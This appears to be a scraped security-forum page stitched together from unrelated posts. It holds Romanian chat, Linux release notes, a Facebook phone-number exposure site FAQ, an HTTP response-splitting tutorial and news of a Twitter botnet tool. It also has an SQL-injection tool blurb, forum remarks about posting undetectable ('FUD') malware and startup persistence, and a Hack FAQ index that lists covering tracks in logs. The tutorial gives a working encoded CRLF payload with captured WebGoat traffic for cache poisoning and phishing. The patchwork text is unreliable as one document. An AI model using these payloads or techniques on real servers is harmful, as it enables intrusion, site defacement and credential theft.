begood

"1) nu e begood!" oh the horror, why oh why ? se vede clar ca nu-s eu, nu mai am burta de bere

"Gamingul nu exista, nu a existat si nici nu va exista pe Linux." wtf?

Ultimate Edition, first released in December 2006, is a fork of Ubuntu. The goal of the project is to create a complete, seamlessly integrated, visually stimulating, and easy-to-install operating system. Single-button upgrade is one of several special characteristics of this distribution. Other main features include custom desktop and theme with 3D effects, support for a wide range of networking options, including WiFi and Bluetooth, and integration of many extra applications and package repositories. DistroWatch.com: Ultimate Edition

Steven Shiau has announced the release of Clonezilla Live 1.2.5-17, a new stable version of the specialist live CD designed for hard disk partitioning and cloning: This release of Clonezilla live (1.2.5-17) includes major enhancements, changes and bug fixes. MAJOR ENHANCEMENTS and CHANGES: * This release was created by live-helper 2.0~a11-1drbl1, and live-initramfs 1.215.1-1drbl-1 is used. * A version with pure AMD64 (X86-64) programs was created in this release. It can support large partition (e.g. 10 TB) imaging. * The Linux kernel was updated to 2.6.32-12. * Partclone was updated to 0.2.9. It has been reported that the speed of this version is much faster than the previous one. * Package memtest86+ was updated to 4.10. * Package syslinux was updated to 3.86. * Package pbzip2 was updated to 1.1.1, and it's the default program for running bzip2 compression and decompression in parallel. * Package gzrt was added. * Boot parameter "nomodeset" was added with vga=normal to avoid using framebuffer mode in safe graphic mode. BUG FIXES * VGA failsafe mode was not working. * A harmless warning message when running grub2 installation after Ubuntu Lucid is restored was fixed * Suppress and avoid the error message when getting data from EDD. * A NFS locking issue found in Clonezilla live 1.2.5-15 was fixed. The release announcement. Download (MD5): clonezilla-live-1.2.5-17-i686.iso (118MB), clonezilla-live-1.2.5-17-amd64.iso (131MB).

What is this? This site randomly displays the private phone numbers of unsuspecting Facebook users.Who made it? Hello. I'm Tom Scott. I live at tomscott.com, and you can email me or follow me on Twitter. The lightning photo is from Hugo on Flickr and is under a Creative Commons license. How does it work? There are uncountable numbers of groups on Facebook called "lost my phone!!!!! need ur numbers!!!!!" or something like that. Most of them are marked as 'public', or 'visible to everyone'. A lot of folks don't understand what that means in Facebook's context — to Facebook, 'everyone' means everyone in the world, whether they're a Facebook member or not. That includes automated programs like Evil, as well as search engines. Can you be more specific? Evil uses the graph API to search for groups about lost phones. It picks them at random, extracts some of the phone numbers, and then shows them here. Are you cracking Facebook? This site isn't doing anything that you couldn't already do manually, or by just doing a simple Google search. It's just a bit more dramatic. Are you storing the results? No. I don't even see the phone numbers. All the processing is happening on your own computer. How do I make my number private? Go into all the "lost number" groups you've ever joined. Ever. Delete your posts. (You might want to try searching for your own phone number on Google, too; it might turn up in unexpected places.) Why do the numbers cluster into area codes? Evil reads up to 25 numbers from one group to avoid unnecessary strain on Facebook. These tend to be friends in the same geographical area, hence, the same code. Give it a few seconds, it'll change. Why are you censoring the last few digits? It's called Evil, not diabolic. Those digits are publicly available though, and I - or anyone malicious - could easily flick a metaphorical switch and show them here. Or produce a phone directory. Or nick them for marketing. Don't forget, the Facebook pages you "Like" are public too. It's broken! Quite possibly. This was coded in a few hours' frenzy after getting the idea, and there are almost certainly bugs. A great flood of users (more than one every two seconds) may also trigger Facebook's rate limiting. Needless to say, this site is not affiliated with Facebook, which may also hamper it from time to time. Why's it called Evil? Because it's evil. Duh. http://www.tomscott.com/evil/

@Ellimist multumesc and sorry about that.

Mi-am pus întrebarea asta de nenum?rate ori, f?r? a putea ajunge la o concluzie anume. Câteva exemple : "am facut poza asta cu aparatul meu nikon d90 :> nu-i asa c? nikon e cel mai bun aparat din lume ? poza nu ar fi ie?it la fel cu alt aparat !" "linux rulz, windows suckz" "mac rulz, windows suckz" Idolatriz?m uneltele, spunem "omg ?sta-i cel mai bun aparat din lume, e awesome, e mult mai bun ca aparatul t?u, aparatul meu e perfect bla bla bla" dar uit?m c? sunt sute altele la fel de bune, care fac exact acela?i lucru : rezolv? aceea?i problem? la fel de bine, poate chiar mult mai bine. De exemplu bat un cui în lemn. Pe cine intereseaz? c? am folosit ciocanul de tip mx2n de la compania Musz inc. atât timp cât ?i-a facut treaba, cuiul a intrat frumos in lemn, iar mie îmi place s?-l folosesc ? De unde obsesia asupra uneltei, de ce nu ne concentr?m asupra modului de folosire a acesteia ? Care-i obsesia voastr?, de ce crede?i ca oamenii idolatrizeaz? anumite lucruri ?i de ce/de unde crede?i ca ave?i aceaste obsesii ?

Http splitting is a website attack. It involves an injection of a Http request into a form to force the target server to return two answers instead of one. It is possible due to the redirection of a request (code 3xx, "set-cookie" or "Location") without checking illegal characters. This article describes this attack and the Owasp WebGoat training platform. A french version of this article is also available. description In a normal operation, each client sends an Http request, and the server responds. With an http splitting attack, an attacker fills the form with malformed datas (textField). The server then sends back two responses, one of which was created by the attacker. exploitation this technique allows: cache poisoning the attacker sends two requests, a first malformed one and a second valid one. The server sends back two responses from the first request, and a third one from the second request. The server cache makes an association between the second request (created by the attacker) and the second request (valid). The attacker can obtain a defacement of the website. next generation phishing This is a special case of the previous cache poisoning technique. The attacker choses, in his second request, a password form webpage. He puts a copy of this page in his first request . This page redirects the request to a server controled by the attacker. The vulnerable server caches this page for further requests. As a result, when a victim asks later for the server password webpage, she is instead redirected to the attacker webpage (phishing). The attacker can store the victim pasword. webpage hijacking The next step of attacks is the hijacking of webpages containing user datas, when a (not vulnerable) proxy is placed between the vulnerable server and the client. The attacker sends a malformed request (1) to the proxy. The proxy redirects the malformed request (1) to the server. The server sends back the two splitted responses (1) and (2) to the proxy. A victim sends a regular request (3) to the server through the proxy. The proxy sends immediatly the response (2) as the response to this request. The server sends the response to the request (3) to the proxy. This response holds user's personal data. The attacker sends another request (4) to the proxy. The proxy immediatly sends to the attacker the response (3). method For an illustration of the method, please see Yehg video([9]) and Ajax blog ([6]). In this example we conduct a cache poisoning attack. Here is the injected text: "Content-Length: 0 HTTP/1.1 200 OK Last-Modified: Fri, 31 Dec 2099 23:59:59 GMT coucou" When this text is encoded in http, replace: - ":" by %3A - "space" by %20 - "carriage return" by %0A - "," by %2c - "/" by %2F - "<" by %3C - ">" by %3E result in http: "Content-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0ALast-Modified%3A%20Fri%2C%2031%20Dec%202099%2023%3A59%3A59%20GMT%0A%3Chtml%3E%0Acoucou%3C%2Fhtml%3E" replace every %0A by %0A%0D: "Content-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0ALast-Modified%3A%20Fri%2C%2031%20Dec%202099%2023%3A59%3A59%20GMT%0D%0A%3Chtml%3E%0D%0Acoucou%3C%2Fhtml%3E" To encode en replace %0A, let's use PHP charset encoder http://h4k.in/encoding/ (cf Yegh video [9]). explanations This technique needs a redirection of pages: Remember: with this method, the server must put data entered by the attacker in the header of a redirected request ( code 3xx, "Set-Cookie" or "Location" fields): In the http protocol, with a redirection, data are put in the header of the new redirected request [3]. usually, they are in header's fields "Set-Cookie" or "Location". Why %0d%0a? CR = Carriage return ( %0d or \r or ASCII 13) LF = Line Feed (%0a or \n or ASCII 10) http is built as follow: - initial line, ends with CRLF - header lines, ends with CRLF - blank line (= CRLF) - body. As our string must be interpreted as an http request we replace LF by CRLF. Why a cache poisoning? Response from server contains line Last-Modified, with date defined as 2099. HTTP/1.1 200 OK Last-Modified: Fri, 31 Dec 2099 23:59:59 GMT coucou this page is associated with any further request to the server: As its date is bigger than the current date, it is never replaced by a newer one. What happen on server side? Let's use the example given with WebGoat. Let's intercept http requests with WebScarab: Write "essai" in textfield The request sent to Server (A) is: POST HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: Cookie: JSESSIONID=93E6CFEC40001E4F08A62D2B3467ECCE Content-Type: application/x-www-form-urlencoded Content-length: 31 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= language=essai&SUBMIT=Search%21 redirection response (302) received from server (A) is: HTTP/1.1 302 Déplacé Temporairement Server: Apache-Coyote/1.1 Location: &fromRedirect=yes&language=essai Content-Type: text/html;charset=ISO-8859-1 Content-length: 0 Date: Sat, 19 Dec 2009 17:12:27 GMT result: - this response is a redirection (status code 302), - our string is put in field "Location" of the header Server (A) redirects the request to server (: GET HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: &Restart=3 Cookie: JSESSIONID=93E6CFEC40001E4F08A62D2B3467ECCE Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= Response from server ( shows the resulting page. Here it is (trunkated): HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 01:00:00 CET Content-Type: text/html;charset=ISO-8859-1 X-Transfer-Encoding: chunked Date: Sat, 19 Dec 2009 17:37:46 GMT Content-length: 33406 <.!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <.html xmlns="http://www.w3.org/1999/xhtml"> <.head> <.meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <.title>HTTP Splitting <.link rel= (...) /> <.script language= (...) <.body class="page" (...) Now inject malformed request: Request from client to server (A) is: POST HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: Cookie: JSESSIONID=93E6CFEC40001E4F08A62D2B3467ECCE Content-Type: application/x-www-form-urlencoded Content-length: 251 Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= language=Content-Length%253A%25200%250D%250A%250D%250AHTTP%252F1.1%2520200%2520OK%250D%250ALast-Modified%253A%2520Fri%252C%252031%2520Dec%25202099%252023%253A59%253A59%2520GMT%250D%250A%253Chtml%253E%250D%250Acoucou%253C%252Fhtml%253E&SUBMIT=Search%21 Redirection response (302) receivd from server (A) is: HTTP/1.1 302 Déplacé Temporairement Server: Apache-Coyote/1.1 Location: &fromRedirect=yes&language=Content-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0ALast-Modified%3A%20Fri%2C%2031%20Dec%202099%2023%3A59%3A59%20GMT%0D%0A%3Chtml%3E%0D%0Acoucou%3C%2Fhtml%3E Content-Type: text/html;charset=ISO-8859-1 Content-length: 0 Date: Sat, 19 Dec 2009 17:26:09 GMT Server (A) "believes" it redirects request to server (: GET %0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0ALast-Modified%3A%20Fri%2C%2031%20Dec%202099%2023%3A59%3A59%20GMT%0D%0A%3Chtml%3E%0D%0Acoucou%3C%2Fhtml%3E HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: &Restart=3 Cookie: JSESSIONID=93E6CFEC40001E4F08A62D2B3467ECCE Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= This response is encapsulated by http protocol in TCP datagrams as follow: * empty redirection request sent to server ( GET * end of the request %0D%0A %0D%0A * response sent in current TCP session (to attacker) HTTP%2F1.1%20200%20OK%0D%0ALast-Modified%3A%20Fri%2C%2031%20Dec%202099%2023%3A59%3A59%20GMT%0D%0A%3Chtml%3E%0D%0Acoucou%3C%2Fhtml%3E * data rejected (not compatible with http protocol): HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: &Restart=3 Cookie: JSESSIONID=93E6CFEC40001E4F08A62D2B3467ECCE Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - and here is the second message sent by server (A) to attacker: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 01:00:00 CET Content-Type: text/html X-Transfer-Encoding: chunked Date: Sat, 19 Dec 2009 17:28:10 GMT Content-length: 21 coucou remarks - Splitting attacks can be logged by target site if they are sent with GET method. Usually, it is not the case as attackers should prefer using POST requests ([2], page 24). - splitting attack defacement is not detected by anti-defacement IDS. Indeed, these IDS alayse usually static pages, and not the cache. - This attack is possible because of 1.1 http version. Http 1.1 allows client and server to exchange multiple requests in a same TCP session. Before, Http 1.0 needed a TCP connexion for each http exchange. Tools java-JRE http://www.java.com/fr/download/ OWasp WebGoat http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project PHP charset encoder http://h4k.in/encoding/ references 1) Wikipedia - Http response splitting - http://en.wikipedia.org/wiki/HTTP_response_splitting 2) Sanctum Inc, Http response Splitting whitepaper - http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf 3) James Marshall - Http made really easy - http://www.jmarshall.com/easy/http/#structure 4) Web application security consorsium - Http response splitting - http://www.webappsec.org/projects/threat/classes/http_response_splitting.shtml 5) Securiteam - http response splitting - http://www.securiteam.com/securityreviews/5WP0E2KFGK.html 6) Ajax - Séparation de réponse http - http://blog.4j4x.net/?p=15 7) publication du CERT-IST - les attaques de type "http response splitting" http://www.cert-ist.com/fra/ressources/Publications_ArticlesBulletins/Veilletechnologique/HTTP_spliting/ 8) OWasp - Http response splitting - http://www.owasp.org/index.php/HTTP_Response_Splitting 9) yehg - vidéo décrivant une exploitation de http splitting attack - http://yehg.net/lab/pr0js/training/webgoat.php 9) MISC n°24 - http://www.unixgarden.com/index.php/administration-reseau/smuggling-et-splitting-du-html source : http://infond.blogspot.com/2010/04/tutorial-http-splitting-attack-with.html

WeakNet Labs has just released the latest version of its highly customized WeakNet Linux, a penetration testing Linux distribution packed with goodies for security experts and sysadmins, but not only. WeakNet Linux IV brings the first release of the custom WeakerThan Linux kernel with built-in support for packet injection and a faster boot time. It also comes with a lot of tools for testing a network’s strength to attacks and other types of security-related testing. WeakNet Linux IV packs in a lot of punch. The OS boots lightning-fast, thanks to a great deal of optimizations on this part. It’s very lightweight, it uses Fluxbox as a window manager and most utilities have been chosen with speed in mind. Google Chrome is now the default web browser, its speed and relatively small memory footprint made it a perfect candidate for WeakNet. WeakNet Linux IV also gets a visual revamp with a new Fluxbox theme and boot splash. WeakNet Linux IV Applications (including full list) and Themes and more) Highlights of WeakNet Linux IV: · WeakerThan Linux kernel 1.0; · Wireless penetration testing tools: FreeRADIUS WPE edition, AIRPWN, a customized Kismet, and a lot more; · Better wireless support, with Ath9k, Ath5k, Rt73USB and Broadcom drivers modified for packet injection; · Boots directly into X, skips any graphical login manager; · More ‘user-friendly’ pen testing tools; · FTP and networking clients like VNC and Filezilla; · Better MITM (Man-in-the-middle) support and new apps; · Google Chrome replaces Mozilla Firefox; · RAV hunter - a new tool that seeks and destroys rogue antivirus clients on infected Windows machines; · SAM Hunter - a utility to reset passwords on Windows 7,Vista, XP and NT machines; · Technician utilities - a bunch of utilities for Windows and Mac admin and security-related jobs.

The Windows boot process is a fragile thing. A single corrupt byte on your hard drive, a buggy boot driver or missing Registry key could be enough to break it. And that'll leave you staring at an error message, or maybe a blank screen, the next time you start your PC. Windows has plenty of recovery options, of course - Safe Mode, Last Known Good Configuration, Startup Repair - but if these fail to deliver, and you've no recent backups to restore, then you'll need to look further afield. Fortunately there are plenty of recovery options available. If your troubles are due to malware, for instance, then many of the top antivirus vendors offer free bootable rescue CDs that might be able to help. But if the virus has damaged some critical file or hard drive structure then removing the malware alone won't be enough. So you may need a recovery disc with extra powers, something that can fix broken boot records, solve partition problems, scan the Registry and more. Whatever approach you take, be careful: an inappropriate "fix" can cause more problems than it solves. If possible, we'd recommend you back up your hard drive before you start, so it can be restored later if necessary. And with that done, you can go looking for a recovery disc to suit your needs. Or, better still, check our list, download any that appeal, and you'll have them to hand if disaster strikes. 1. AVG Rescue CD, 69.3MB The AVG Rescue CD is a portable version of AVG Anti-Virus that can be launched from a CD or USB flash drive. It will then try to obtain the latest antivirus definitions, if an internet connection is available, before scouring your PC for malware and removing anything it uncovers. There's more to the disc than antivirus, though. You also get TestDisk, a powerful tool that can solve partition problems and fix broken boot records, as well as sorting out many other hard drive issues. A simple Registry editor lets you tweak your PCs Registry (if it's accessible). And it all else fails then you may at least be able to recover important documents with Midnight Commander, a capable file manager. 2. Avira AntiVir Rescue System, 64.2MB The Avira AntiVir Rescue System is updated several times a day to ensure it always contains the most recent antivirus definitions. So if you need a recovery disc, then download the latest version from another computer, run it, and allow the program to burn a boot CD for you (there's no bootable flash drive option). Launch your PC from the Rescue System and you'll find an easy-to-use GUI with some useful configuration options. It can try to download more updates, if a network connection is available, and will then set to work scanning your system for threats. If the antivirus engine doesn't get your PC running again, though, there's little else here to help. You can open a Linux command window to try and explore the stricken PC further, but that's all. 3. BitDefender Rescue CD, 260MB The BitDefender Rescue CD works much like most of the antivirus competition: burn its ISO file to CD, boot from this and you'll be able to download the latest virus definitions, then scan your system for malware. What's a little different, though, is the range of extras that you get as well. There are text editors (Vim, Xedit), file managers (Midnight Commander, RoxFiler), Firefox, a rootkit detector (ChkRootkit), the Nexus Network Scanner, and a whole lot more. Of course these are all Linux-based tools (Knoppix, to be precise), so if you're strictly Windows-only then it may take a while to figure out what's going on, but this is still an above-average recovery CD. 4. Hiren's BootCD, 187MB Hiren's BootCD is an amazing LiveCD with an array of troubleshooting utilities. Useful antivirus tools include Spybot - Search & Destroy and Malwarebytes Anti-Malware; there are a stack of utilities to check your master boot record and partition table and fix any problems; and others can reset a forgotten Windows password, finally allowing you to log on. You'll also find system information tools, memory testers, network utilities, BIOS tools and more. You need to be careful when using some of these, as many of the tools won't work on anything later than Windows XP, and in fact could cause problems with later systems. But still, if your PC won't boot and you've no idea why then this is one of the best places to start finding out. 5. Norton Bootable Recovery Tool, 167.63MB Run the new Norton Bootable Recovery Tool (NBRT) and it'll quickly create a bootable CD, DVD or USB flash drive with the very latest Norton antivirus tools. And it's such a sophisticated disc builder that you can even include your choice of drivers, useful if you need RAID support. If your PC isn't booting due to a malware-related issue then this just might be enough to get it running again. The NBRT will be bundled with Norton Internet Security 2011, and so you'll need a product key from the NIS 2011 beta before you can use it. This only takes a moment: just visit the beta registration page, enter your details and you'll be sent a product key via email. (There's no need to download the NIS 2011 beta unless you're interested in that as well.) 6. Paragon Rescue Kit Express, 45.7MB Paragon Rescue Kit Express may be a cut-down version of the full Rescue Kit package, but it could still come in very useful. The program creates a bootable CD that includes the Boot Corrector, a useful tool that can fix many common boot problems. There's an Undelete Partition Wizard to restore accidentally deleted or lost partitions. And if these don't work, the File Transfer Wizard will at least help you export critical files from your broken PC to another system. Please note that Rescue Kit Express is free for non-commercial use only, and You must register with Paragon before you can create the boot disc, 7. Parted Magic, 79.4 MB Parted Magic is a Live CD that takes components from Parted and Gparted to deliver a great deal of partitioning power, in an attractive and easy-to-use interface. There's little in the way of recovery options, unfortunately, but Parted Magic does include many other tools that may be able to help. TestDisk will try to locate lost partitions, for instance. Browsers will take you online, if there's an internet connection available, for more advice. And a variety of backup tools will copy files or clone your hard drive, useful as a precaution if your attempts to fix the boot problems actually make things worse. 8. Partition Wizard, 39.2MB Partition Wizard's recovery disc comes in a relatively compact 39MB ISO file, but it still manages to cram in plenty of hard drive-related functionality, and an easy-to-use GUI. The key function on offer here is the ability to rebuild your hard drive's Master Boot Record, the structure that stores vital information like your partition table. And there's also a partition recovery wizard that will scan your drive for lost or deleted partitions. But if you need them, there are plenty of other functions on offer: you can move, resize, merge or copy partitions, convert a partition's file system, convert a dynamic disk to a basic disk, and more. 9. Trinity Rescue Kit, 118MB The Trinity Rescue Kit is another Live CD that specialises in system repair and recovery functions. There are tools to rebuild the partition table, reset passwords, detect viruses and recover data, and you also get a samba server, ssh server, disk cloning and more. The system is command-line based, though, so don't expect much in the way of handholding. It's also looking a little dated at the moment; the site warns that "virusscan is still largely broken because of AV vendor side changes", and the last release was in July 2009 so it's probably not a good idea to try the disc on a Windows 7 system. Still, if the author releases an update soon, or you know what you're doing at the Linux command line, then the Trinity Rescue Kit could still be worth a look. 10. Shardana Antivirus Rescue Disk Utility, 3.01MB If you've read our list and are unsure which might be the best recovery disc for you, then Shardana may have the answer. It's able to combine the boot discs of many different companies and tools - AVG, Avira, BitDefender, F-Secure, GData, Panda, Parted Magic, Partition Wizard and more - into a single package, then create just one ISO file or bootable USB flash drive that will run them all. The program doesn't come with the various ISO files, of course: you'll have to download them yourself. And we wouldn't be at all surprised if installing multiple antivirus tools on the same disc resulted in occasional conflicts and odd behaviour. If you're willing to take the time to experiment, though, SARDU really could help you create the ultimate in bootable system recovery discs. ------------------------------------------------------------------------------------------------------- Liked this? Then read our Expert guide to preventing PC disasters Read more: 10 free tools to get an unbootable PC working | News | TechRadar UK

reclama la greu.

a mers la cineva ? daca nu, va fi sters. @totti93 mai intreb o data. de ce l-ai criptat ?

This is the second of two articles looking at nanotechnology as a future technological risk. One of the scariest issues I can think of with respect to nanotechnology is self-replicating nanobots. The prospect of loosing little machines that can copy themselves without specific external control raises the specter of "The Sorcerer's Apprentice" and Mickey Mouse in that role in Disney's 1940 animated film, Fantasia. For science fiction fans, there are many examples of self-replicating machines to titillate or terrify; the replicators in the Stargate universe come to mind. In the information assurance field, it is pretty well established that creating self-replicating code, even for the best of intentions, is a bad idea; the fundamental problem is that no matter how carefully one applies quality assurance and testing to such code, external conditions are inevitably more variable than anything that can be tested in a finite time. Just think about all the combinations of operating system versions, update levels, application software, versions of that software, configuration combinations for all of the above, and run-time variations in when and how code segments are executed. For a classic and thorough review of the arguments, see Vesselin Bontchev's 1994 paper, "Are 'Good' Computer Viruses Still a Bad Idea?" which actually concludes that they could be a good idea (I still disagree, but it's a good paper). Self-replicating nanobots :: Hack In The Box :: Keeping Knowledge Free

A researcher with anti-virus software vendor Sunbelt, Christopher Boyd, has recently discovered a tool that facilitates in building armies of bots which take their instructions from specific Twitter accounts, as per the news published by The Register on May 13, 2010. The tool, known as TwitterNET Builder, creates malicious executables which hackers can forward to the systems of other users. They can either send mails with file attachments or send the instant messages bearing links to the infected executables. On opening the files, user's PC gets infected with malware that allows cybercriminals to manage it through a Twitter account. Moreover, networks of infected PCs (called botnets) can then flood websites with traffic, which causes them to distribute denial-of-service (DDoS) attacks by means of User Datagram Protocol (UDP). It can successfully open a webpage, halt all bot activities and eliminate connecting bots. They can be used to distribute junk e-mails and a higher number of malware. The security researchers explained that however it is not known to have any autostart technique or propagation capability, but even then the attacker could probably install the bot server manually onto a PC, or could deceive a user to run the file. So they advised users to be careful while opening attachments or running files originating from unknown and unreliable sources. In the meantime, Twitter was informed about the potential danger of the botnet and they are taking apt measures to block the further propagation of this malware. Boyd applauded Twitter for handling the issue seriously. He recalled that it took precisely 13 minutes to reply to his e-mail, which seems quite impressive when we talk of standards, as per the news published by Webuser on May 13, 2010. It is learnt that Twitter has been misused as a command and control centre in past also. In 2009, cybercriminals used Twitter to run botnets. According to security researchers at security firm F-Secure, a network of compromised computers was given directions through a fake Twitter account. Besides Twitter, Facebook, Google Groups and Google's AppEngine are some other examples of this cloud-based model. Twitter Botnet Facilitator Tool Identified - SPAMfighter

cat de darnic esti tu, un post si direct ne dai gratuit ceva FUD eh... ban

Absinthe is a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection. Absinthe does not aid in the discovery of SQL Injection holes. This tool will only speed up the process of data recovery. Features: Automated SQL Injection Supports MS SQL Server, MSDE, Oracle, Postgres Cookies / Additional HTTP Headers Query Termination Additional text appended to queries Supports Use of Proxies / Proxy Rotation Multiple filters for page profiling Custom Delimiters 0x90.org // [Absinthe :: Automated Blind SQL Injection] // ver1.3.1

posteaza executabilul :]

neah, it's cute.

eu mai am de trait

il bagi la startup prin mai multe metode :] oh the good old days...

The Hack FAQ: Table of Contents Table of Contents 1.0 Administrivia What is the mission and goal of this FAQ? How was this FAQ prepared? How do I add to this FAQ? Contributors Other Credits Where can I download this FAQ? Where is the disclaimer? Changelog 2.0 Attack Basics What are the four steps to hacking? 3.0 Account Basics What are accounts? What are groups? 4.0 Password Basics What are some password basics? Why protect the hashes? What is a dictionary password cracker? What is a brute force password cracker? Which method is best for cracking? What is a salt? What are the dangers of cracking passwords? Where are the password hashes stored? Are there any password schemes that are safe? Is there any way I can open a password-protected Microsoft Office document? 5.0 Denial of Service Basics What is Denial of Service? What are some DoS scenarios? What is the Ping of Death? What is a SYN Flood attack? What are other popular DoS attacks? What are distributed DoS attacks? How can I discover new DoS attacks? How does one defend against DoS attacks? 6.0 Logging Basics Why do I care about auditing, accounting, and logging? What are some different logging techniques used by Admins? Why should I not just delete the log files? 7.0 Miscellaneous Basics What is a backdoor? What is a buffer overflow? What is "lame"? How do I get around censorware like Net Nanny or the Great Firewall of China? How can I forge email addresses? What's with ICQ? 8.0 Web Browser What is unsafe about my browser? What is in the history, bookmark, and cache files? What other browser files are important? Can you tell me more about the cookie file? How can I protect my browser files? So why all of the paranioa about browsers? 9.0 The Web Browser as an Attack Tool What is phf? What's the "test" hack? What about that "~" character? What is the jj.c problem? What's the deal with forms? What will this look like in the target's log files? What's the deal with Server-Side Includes? What if SSIs are turned on but includes are stripped from user input? What are SSL? How can I attack anonymously? What is the asp dot attack? What is the campas attack? What is the count.cgi attack? What is the faxsurvey attack? What about finger.cgi? What is the glimpse exploit? What are some other CGI scripts that allow remote command execution? What are the MetaInfo attacks? 10.0 The Basic Web Server What are the big weak spots on servers? What are the critical files? What's the difference between httpd running as a daemon vs. running under inetd? How does the server resolve paths? What log files are used by the server? How do access restrictions work? How do password restrictions work? What is web spoofing? 11.0 NT Basics What are the components of NT security? How does the authentication of a user actually work? What is "standalone" vs. "workgroup" vs. "domain"? What is a Service Pack? What is a Hot Fix? Where are Service Packs and Hot Fixes? What's with "C2 certification"? Are there are interesting default groups to be aware of? What are the default directory permissions? Are there any special restrictions surrounding the Administrative Tools group in Presentation Manager? What is the Registry? What are hives? Why is the Registry like this and why do I care? What is the deal with Microsoft's implementation of PPTP? 12.0 NT Accounts What are common accounts and passwords in NT? What if the Sys Admin has renamed the Administrator account? How can I figure out valid account names for NT? What can null sessions to an NT machine tell me? 13.0 NT Passwords How do I access the password file in NT? What do I do with a copy of SAM? What's the full story with NT passwords? How does brute force password cracking work with NT? How does dictionary password cracking work with NT? I lost the NT Administrator password. What do I do? How does a Sys Admin enforce better passwords? Can an Sys Admin prevent/stop SAM extraction? How is password changing related to "last login time"? 14.0 NT Console Attacks What does direct console access for NT get me? What about NT's file system? What is Netmon and why do I care? 15.0 NT Client Attacks What is GetAdmin.exe and Crash4.exe? Should I even try for local administrator access? I have guest remote access. How can I get administrator access? What about %systemroot%\system32 being writeable? What if the permissions are restricted on the server? What exactly does the NetBios Auditing Tool do? What is the "Red Button" bug? What about forging DNS packets for subversive purposes? What about shares? How do I get around a packet filter-based firewall? I hack from my Linux box. How can I do all that GUI stuff on remote NT servers? What's the story with WinGate? How do I find these buggy WinGates I can use? 16.0 NT Denial of Service What can telnet give me in the way of denial of service? What can I do with Samba? What's with ROLLBACK.EXE? What is an OOB attack? Are there any other Denial of Service attacks? 17.0 NT Logging and Backdoors Where are the common log files in NT? How do I edit/change NT log files without being detected? So how can I view/clear/edit the Security Log? How can I turn off auditing in NT? 18.0 NT Misc. Attack Info How is file and directory security enforced? What is NTFS? Are there are vulnerabilities to NTFS and access controls? What is Samba and why is it important? How do I bypass the screen saver? How can I detect that a machine is in fact NT on the network? Can I do on-the-fly disk encryption on NT? Does the FTP service allow passive connections? What is this "port scanning" you are talking about? Does NT have bugs like Unix' sendmail? How is password changing related to "last login time"? Can sessions be hijacked? Are "man in the middle" attacks possible? What about TCP Sequence Number Prediction? What's the story with buffer overflows on NT? 19.0 Netware Accounts What are common accounts and passwords for Netware? How can I figure out valid account names on Netware? 20.0 Netware Passwords How do I access the password file in Netware? What's the full story with Netware passwords? How does password cracking work with Netware? How does password cracking work with Netware? Can an Sys Admin prevent/stop Netware password hash extraction? Can I reset an NDS password with just limited rights? What is OS2NT.NLM? How does password encryption work? Can I login without a password? What's with Windows 95 and Netware passwords? 21.0 Netware Console Attacks What's the "secret" way to get Supe access Novell once taught CNE's? How do I use SETPWD.NLM? I don't have SETPWD.NLM or a disk editor. How can I get Supe access? What's the "debug" way to disable passwords? How 